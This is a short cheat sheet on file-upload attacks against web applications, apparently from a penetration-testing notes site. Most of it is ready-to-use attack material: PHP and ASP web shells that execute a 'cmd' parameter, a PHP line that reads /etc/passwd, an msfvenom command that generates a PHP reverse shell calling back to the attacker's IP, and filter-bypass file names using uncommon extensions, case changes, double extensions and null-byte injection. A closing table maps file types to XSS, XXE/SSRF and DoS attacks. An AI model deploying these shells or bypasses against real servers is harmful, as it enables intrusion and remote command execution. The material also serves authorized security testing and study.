File-upload-attacks

gi### Web Shells

<?php file_get_contents('/etc/passwd'); ?>
### Basic PHP File Read

<?php system('hostname'); ?>
### Basic PHP Command Execution

<?php system($_REQUEST['cmd']); ?>
### Basic PHP Web Shell

<% eval request('cmd') %>
### Basic ASP Web Shell

msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
### Generate PHP reverse shell

Web/Reverse Shells

PHP Web Shell: Basic web shell for PHP
PHP Reverse Shell: Reverse shell for PHP
Web/Reverse Shells: List of common web and reverse shells

Bypasses

[CTRL+SHIFT+C]
### Client-Side Bypass: Toggle Page Inspector

Blacklist Bypass

shell.phtml ### Uncommon Extension
shell.pHp ### Case Manipulation

Whitelist Bypass

shell.jpg.php ### Double Extension
shell.php.jpg ### Reverse Double Extension
%20, %0a, %00, %0d0a, /, .\, ., … ### Character Injection - Before/After Extension

Content/Type Bypass

PHP Extensions: List of PHP extensions
ASP Extensions: List of ASP extensions
Web Extensions: List of web extensions
Web Content-Types: List of web content-types
Content-Types: List of all content-types
File Signatures: List of file signatures/magic bytes

Limited Uploads

Potential Attack

File Types

XSS

HTML, JS, SVG, GIF

XXE/SSRF

XML, SVG, PDF, PPT, DOC

DoS

ZIP, JPG, PNG

PreviousFile-transfer NextShells and payloads

Last updated 2 months ago